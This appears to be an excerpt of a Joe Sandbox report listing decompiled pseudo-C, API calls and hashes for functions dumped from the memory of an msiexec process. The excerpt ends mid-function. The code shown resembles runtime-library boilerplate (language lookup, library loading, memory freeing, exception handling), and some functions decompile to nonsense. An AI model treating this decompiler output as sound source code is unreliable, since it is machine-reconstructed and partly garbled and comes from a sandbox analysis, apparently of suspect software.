Part of subcall function 049D9B84: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?), ref: 049D9BE4

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: a9dd2c66b71fb0e5820a9c434b74403c7e0fcf7a2eca68356f10b74360861dfa
Instruction ID: 1183b138954c300bc1a2851b040379215dff9de86b63a7efb6dedc9ede35056d
Opcode Fuzzy Hash: a9dd2c66b71fb0e5820a9c434b74403c7e0fcf7a2eca68356f10b74360861dfa
Instruction Fuzzy Hash: 8A315AE5600681AEFB31BF7AC48875A77E99B89328F15C939D44A87150DB78F8C8C711

Uniqueness

Uniqueness Score: -1.00%

Function 04A0791C, Relevance: 4.6, APIs: 3, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E04A0791C(signed short* __eax, void* __ecx) {
				intOrPtr _t9;
				signed short _t22;
				intOrPtr* _t23;

				_push(__ecx);
				_t16 = __eax;
				_t22 =  *__eax & 0x0000ffff;
				if(_t22 >= 0x14) {
					if(_t22 != 0x100) {
						if(_t22 != 0x102) {
							if(_t22 != 0x101) {
								if((_t22 & 0x00002000) == 0) {
									_t9 = E04A0F8D0(_t22, _t23);
									if(_t9 == 0) {
										_push(_t16);
										L04A0589C();
										_push(_t16);
										L04A05894();
									} else {
										 *((intOrPtr*)( *((intOrPtr*)( *_t23)) + 0x24))();
										_t9 = 0;
										 *((intOrPtr*)(_t16 + 8)) = 0;
									}
								} else {
									_t9 = E04A07880(__eax, __ecx);
								}
							} else {
								_t9 =  *0x4c959cc();
							}
						} else {
							 *__eax = 0;
							_t9 = E049D9F28( &(__eax[4]));
						}
					} else {
						 *__eax = 0;
						_t9 = E049D9F4C( &(__eax[4]));
					}
				} else {
					_push(__eax); // executed
					L04A0589C(); // executed
					_t9 = E04A07718(__eax);
				}
				return _t9;
			}

0x04a0791e
0x04a0791f
0x04a07921
0x04a07928
0x04a0793c
0x04a07952
0x04a07968
0x04a07979
0x04a07988
0x04a0798f
0x04a079a2
0x04a079a3
0x04a079a8
0x04a079a9
0x04a07991
0x04a07998
0x04a0799b
0x04a0799d
0x04a0799d
0x04a0797b
0x04a0797d
0x04a0797d
0x04a0796a
0x04a0796c
0x04a0796c
0x04a07954
0x04a07954
0x04a0795c
0x04a0795c
0x04a0793e
0x04a0793e
0x04a07946
0x04a07946
0x04a0792a
0x04a0792a
0x04a0792b
0x04a07930
0x04a07930
0x04a079b1

APIs

VariantClear.OLEAUT32(?), ref: 04A0792B

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: cade9aa57959884326689ed7e6d4863ecbda988d7db7916416df36758e4e6660
Instruction ID: acba6999d7b60db20af0801e88225430f8dd6a3d35a61a1d97f54684754c470e
Opcode Fuzzy Hash: cade9aa57959884326689ed7e6d4863ecbda988d7db7916416df36758e4e6660
Instruction Fuzzy Hash: 9901D87CB01210A7AB70BF34F9C46A923E55F44394B60C47194469B1E5EB34BC49D3E3

Uniqueness

Uniqueness Score: -1.00%

Function 049DD9A4, Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E049DD9A4(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E049DA00C(_v8);
				E049DA00C(_v12);
				_push(_t84);
				_push(0x49ddabb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E049D9F28(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E049DDAC2);
					return E049D9F88( &_v28, 6);
				}
				E049DA350( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E049DD6C8(_v8, _t60, _t61,  &_v16, _t81);
					if(_v16 == 0) {
						L049D51DC();
						E049DD078(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E049DD7F4(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4c92c10;
							if( *0x4c92c10 == 0) {
								L049D51E4();
								E049DD078(_t46, _t60,  &_v28, _t79, _t81);
								E049DD7F4(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E049DD8D8(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E049DD7F4(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E049DAFA8(_v12, _t60, 1,  &_v20);
				goto L7;
			}

0x049dd9a4
0x049dd9a4
0x049dd9a7
0x049dd9a9
0x049dd9ab
0x049dd9ad
0x049dd9af
0x049dd9b1
0x049dd9b3
0x049dd9b4
0x049dd9b5
0x049dd9b7
0x049dd9ba
0x049dd9c0
0x049dd9c8
0x049dd9cf
0x049dd9d0
0x049dd9d5
0x049dd9d8
0x049dd9dd
0x049dd9e6
0x049ddaa0
0x049ddaa2
0x049ddaa5
0x049ddaa8
0x049ddaba
0x049ddaba
0x049dd9f2
0x049dd9f7
0x049dd9fc
0x049dda01
0x049dda01
0x049dda03
0x049dda08
0x049dda2f
0x049dda35
0x049dda3e
0x049dda4f
0x049dda57
0x049dda64
0x049dda69
0x049dda6c
0x049dda6e
0x049dda75
0x049dda77
0x049dda7f
0x049dda8c
0x049dda8c
0x049dda75
0x049dda91
0x049dda94
0x049dda9b
0x049dda9b
0x049dda40
0x049dda48
0x049dda48
0x00000000
0x049dda3e
0x049dda0a
0x049dda2a
0x049dda2b
0x049dda2d
0x00000000
0x00000000
0x00000000
0x049dda2d
0x049dda19
0x049dda23
0x00000000

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,049DDABB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,049DDB42,00000000,?,00000105), ref: 049DDA4F
GetSystemDefaultUILanguage.KERNEL32(00000000,049DDABB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,049DDB42,00000000,?,00000105), ref: 049DDA77

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 78542c03f7da7fe022ae37eadc5434cb21b23135ec4fe1695d70af24644eabd7
Instruction ID: ba7a72d759e667dacae2e55ff9ed89f01f94f5ac240ab41c243554466bf7565c
Opcode Fuzzy Hash: 78542c03f7da7fe022ae37eadc5434cb21b23135ec4fe1695d70af24644eabd7
Instruction Fuzzy Hash: 7931FF74A142199FEB20EF98C980BAEB7B9EFC9308F50C675D400A7294D774BE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 049DDAC8, Relevance: 3.1, APIs: 2, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E049DDAC8(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x49ddb82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E049DAC34( &_v536, _t49);
				_push(_v536);
				E049DAC88( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E049DD9A4(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E049DABD0(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E049DDB89);
				E049D9F88( &_v540, 2);
				return E049D9F28( &_v8);
			}

0x049ddad5
0x049ddadb
0x049ddae1
0x049ddae4
0x049ddae8
0x049ddae9
0x049ddaee
0x049ddaf1
0x049ddb04
0x049ddb11
0x049ddb1c
0x049ddb2e
0x049ddb3c
0x049ddb3d
0x049ddb46
0x049ddb55
0x049ddb5a
0x049ddb5e
0x049ddb61
0x049ddb64
0x049ddb74
0x049ddb81

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,049DDB82,?,?,00000000), ref: 049DDB04
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,049DDB82,?,?,00000000), ref: 049DDB55

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: c63fdbf6eb13bd0cc953870449e2773ddd2afab7b4ce67e4dd7edfa43273a016
Instruction ID: 79053e9ae81100f9ade95b8c1c0b2044d124e3e0df09254ac918bff4106ed83b
Opcode Fuzzy Hash: c63fdbf6eb13bd0cc953870449e2773ddd2afab7b4ce67e4dd7edfa43273a016
Instruction Fuzzy Hash: 40119170A4021CAFEB14EB64CC85FDDB3B8EF88314F4185B5A508A3280DA74AF848E90

Uniqueness

Uniqueness Score: -1.00%

Function 049FB108, Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E049FB108(long __eax, void* __ebx, void* __edx, void* __esi) {
				short _v8;
				void* __ecx;
				long _t9;
				signed int _t10;
				void* _t19;
				void* _t25;
				intOrPtr _t28;
				signed int _t30;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;

				_t25 = __edx;
				_t9 = __eax;
				_t34 = _t35;
				_push(_t19);
				_t32 = _t19;
				_t20 = 0x3300;
				if(__edx != 0) {
					_t20 = 0x3b00;
				}
				_t10 = FormatMessageW(_t20, _t25, _t9, 0,  &_v8, 0, 0); // executed
				_push(_t34);
				_push(0x49fb17e);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t35;
				while(_t10 > 0) {
					_t4 = _t10 * 2; // 0x5a59ffff
					_t30 =  *(_v8 + _t4 - 2) & 0x0000ffff;
					if(_t30 <= 0x20) {
						L3:
						_t10 = _t10 - 1;
						__eflags = _t10;
						continue;
					} else {
						_t40 = _t30 - 0x2e;
						if(_t30 == 0x2e) {
							goto L3;
						}
					}
					break;
				}
				E049DA0B0(_t32, _t10, _v8, _t40);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E049FB185);
				return LocalFree(_v8);
			}

0x049fb108
0x049fb108
0x049fb109
0x049fb10b
0x049fb10e
0x049fb110
0x049fb117
0x049fb119
0x049fb119
0x049fb12c
0x049fb133
0x049fb134
0x049fb139
0x049fb13c
0x049fb142
0x049fb149
0x049fb149
0x049fb152
0x049fb141
0x049fb141
0x049fb141
0x00000000
0x049fb154
0x049fb154
0x049fb158
0x00000000
0x00000000
0x049fb158
0x00000000
0x049fb152
0x049fb162
0x049fb169
0x049fb16c
0x049fb16f
0x049fb17d

APIs

FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,04A08385,00000000,00000000,?,00000000,?,?,04A076B2), ref: 049FB12C
LocalFree.KERNEL32(04A08385,049FB185,00003300,00000000,00000000,00000000,04A08385,00000000,00000000,?,00000000,?,?,04A076B2), ref: 049FB178

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID:
API String ID: 1427518018-0
Opcode ID: 8035c0094c5b8ad1c31db863081c168e1f6221e735be097fda210b7093d72633
Instruction ID: 8b9d7c00b02d0b034fb2d15737f90286674093b2365bd4a42a9439f35d713330
Opcode Fuzzy Hash: 8035c0094c5b8ad1c31db863081c168e1f6221e735be097fda210b7093d72633
Instruction Fuzzy Hash: D901F935750204BEF7199E55CD12F7A76AEEBC5B04FA04075B60087688DE75BD208760

Uniqueness

Uniqueness Score: -1.00%

Function 049D6D80, Relevance: 2.6, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E049D6D80() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x04C90AE0;
				while(_t28 != 0x4c90adc) {
					_t2 = _t28 + 4; // 0x4c90adc
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4c80080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4c90adc = 0x4c90adc;
				 *0x04C90AE0 = 0x4c90adc;
				_t26 = 0x400;
				_t23 = 0x4c90b7c;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4c90b7c
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4c90af8 = 0;
				E049D7994(0x4c90afc, 0x80);
				_t18 = 0;
				 *0x4c90af4 = 0;
				_t31 =  *0x04C92B84;
				while(_t31 != 0x4c92b80) {
					_t10 = _t31 + 4; // 0x4c92b80
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4c92b80 = 0x4c92b80;
				 *0x04C92B84 = 0x4c92b80;
				return _t18;
			}

0x049d6d8e
0x049d6da5
0x049d6d93
0x049d6d9e
0x049d6da3
0x049d6da3
0x049d6da9
0x049d6dae
0x049d6db3
0x049d6db5
0x049d6dba
0x049d6dbd
0x049d6dc6
0x049d6dc9
0x049d6dcc
0x049d6dcc
0x049d6dcf
0x049d6dd1
0x049d6dd4
0x049d6dd9
0x049d6dde
0x049d6dde
0x049d6de0
0x049d6de2
0x049d6de2
0x049d6de5
0x049d6de8
0x049d6de8
0x049d6ded
0x049d6dfe
0x049d6e03
0x049d6e05
0x049d6e0a
0x049d6e21
0x049d6e0f
0x049d6e1a
0x049d6e1f
0x049d6e1f
0x049d6e25
0x049d6e27
0x049d6e2e

APIs

VirtualFree.KERNEL32(04C90ADC,00000000,00008000), ref: 049D6D9E
VirtualFree.KERNEL32(04C92B80,00000000,00008000), ref: 049D6E1A

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 7f36e61deb1a55e7236bf478393decccb0f05b6b05d51f5fb9dee0e64c2fcaa7
Instruction ID: f2a0f35f83894f9575c2f86180fc328050ca44a6395e47fe36dd74e547658b1a
Opcode Fuzzy Hash: 7f36e61deb1a55e7236bf478393decccb0f05b6b05d51f5fb9dee0e64c2fcaa7
Instruction Fuzzy Hash: 0F1194B1701210AFE7649F199944726BBE5EB88724F16C4BDD24ADF340DA74FC018BD4

Uniqueness

Uniqueness Score: -1.00%

Function 049D6E31, Relevance: 2.5, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E049D6E31(void* __eax, void* __edx) {

				 *((intOrPtr*)(__edx + __edx - 0x5f)) =  *((intOrPtr*)(__edx + __edx - 0x5f)) + __edx;
			}

0x049d6e36

APIs

CloseHandle.KERNEL32(00000000,049E078A,00000000,049E07A8), ref: 049D6E3F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 049D6E6F

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: 7140b9af08e163c96e49b22b937dbdc2ec40a70e41759eb7ea3eea06bf0b0b99
Instruction ID: c33055ecd9c763e281f599c27a1b43e7db0b8021fb1e62acdd09e44b7fd67571
Opcode Fuzzy Hash: 7140b9af08e163c96e49b22b937dbdc2ec40a70e41759eb7ea3eea06bf0b0b99
Instruction Fuzzy Hash: 8FE04FAC501341BAFB54AF78E85E3597BD0B74430CF098DB9C186C6081DB7CAC44E750

Uniqueness

Uniqueness Score: -1.00%

Function 049D6E30, Relevance: 2.5, APIs: 2, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E049D6E30(void* __eax, void* __edx) {

				 *((intOrPtr*)(__edx + __edx - 0x5f)) =  *((intOrPtr*)(__edx + __edx - 0x5f)) + __edx;
			}

0x049d6e36

APIs

CloseHandle.KERNEL32(00000000,049E078A,00000000,049E07A8), ref: 049D6E3F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 049D6E6F

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: 9738d0ec60192bf934c228670173073f34eb555d49a63000f2807c48ed6e83ef
Instruction ID: e4b7f79d8602b38bd513dfeffb49603262d82ed3ea90b275a7ca22a320c172eb
Opcode Fuzzy Hash: 9738d0ec60192bf934c228670173073f34eb555d49a63000f2807c48ed6e83ef
Instruction Fuzzy Hash: 3AE07E7C601200BAE765AF78E85E75936E8A744308F488CB9D28A86180DB7CAC94EB50

Uniqueness

Uniqueness Score: -1.00%

Function 049D9714, Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E049D9714(struct _EXCEPTION_POINTERS _a4, long _a8) {
				long _v12;
				long _v16;
				signed int _v21;
				void* __ebp;
				void* _t21;
				long _t22;
				long _t27;
				long _t28;
				void* _t32;
				void* _t33;
				void* _t42;
				void* _t43;

				if((_a4.ExceptionRecord->ExceptionFlags & 0x00000006) != 0) {
					L44:
					__eflags = 0;
					return 0;
				} else {
					__eflags =  *0x4c80030;
					if( *0x4c80030 > 0) {
						L36:
						__eax = _a4.ExceptionRecord;
						asm("cld");
						__eax = E049D7D90(_a4.ExceptionRecord);
						__edx = _a8;
						__eax =  *0x4c90020(_a8, E049D975A, __eax, 0);
						__ebx = _v12;
						__eflags =  *__ebx - 0xeedfade;
						__edx =  *(__ebx + 0x14);
						__eax =  *(__ebx + 0x18);
						if( *__ebx == 0xeedfade) {
							L41:
							__eax = E049D91B4(__eax);
							__ecx =  *0x4c9000c; // 0x0
							__eflags = __ecx;
							if(__ecx != 0) {
								__eax =  *__ecx();
							}
							__ecx = _v12;
							__eax = 0xd9;
							__edx =  *(__ecx + 0x14);
							_v16 =  *(__ecx + 0x14);
							__ebp = __esp;
							_v21 = __al;
							__eax = _v16;
							 *0x4c80004 = _v16;
							__eax = _v21 & 0x000000ff;
							__eax = E049D9D4C(_v21 & 0x000000ff);
							__ecx = __ecx;
							__ebp = __ebp;
							return __eax;
						} else {
							__edx =  *0x4c90018; // 0x0
							__eflags = __edx;
							if(__edx == 0) {
								L1:
								_t35 = _v12;
								_t21 =  *_v12;
								_t42 = _t21 - 0xc0000092;
								if(_t42 > 0) {
									__eflags = _t21 - 0xc0000096;
									if(__eflags > 0) {
										_t22 = _t21 - 0xc00000fd;
										__eflags = _t22;
										if(_t22 == 0) {
										} else {
											__eflags = _t22 != 0x3d;
											if(_t22 != 0x3d) {
												goto L32;
											}
										}
									} else {
										if(__eflags == 0) {
										} else {
											_t27 = _t21 - 0xc0000093;
											__eflags = _t27;
											if(_t27 == 0) {
												goto L27;
											} else {
												_t28 = _t27 - 1;
												__eflags = _t28;
												if(_t28 == 0) {
												} else {
													__eflags = _t28 != 1;
													if(_t28 != 1) {
														goto L32;
													}
												}
											}
										}
									}
								} else {
									if(_t42 == 0) {
										L24:
									} else {
										_t43 = _t21 - 0xc000008e;
										if(_t43 > 0) {
											__eflags = _t21 + 0x3fffff71 - 2;
											if(__eflags < 0) {
												goto L24;
											} else {
												if(__eflags != 0) {
													goto L32;
												}
											}
										} else {
											if(_t43 == 0) {
											} else {
												_t32 = _t21 - 0xc0000005;
												if(_t32 == 0) {
												} else {
													_t33 = _t32 - 0x87;
													if(_t33 == 0) {
													} else {
														if(_t33 == 1) {
															L27:
														} else {
															L32:
														}
													}
												}
											}
										}
									}
								}
								return E049D6FBC( *((intOrPtr*)(_t35 + 0xc)));
							} else {
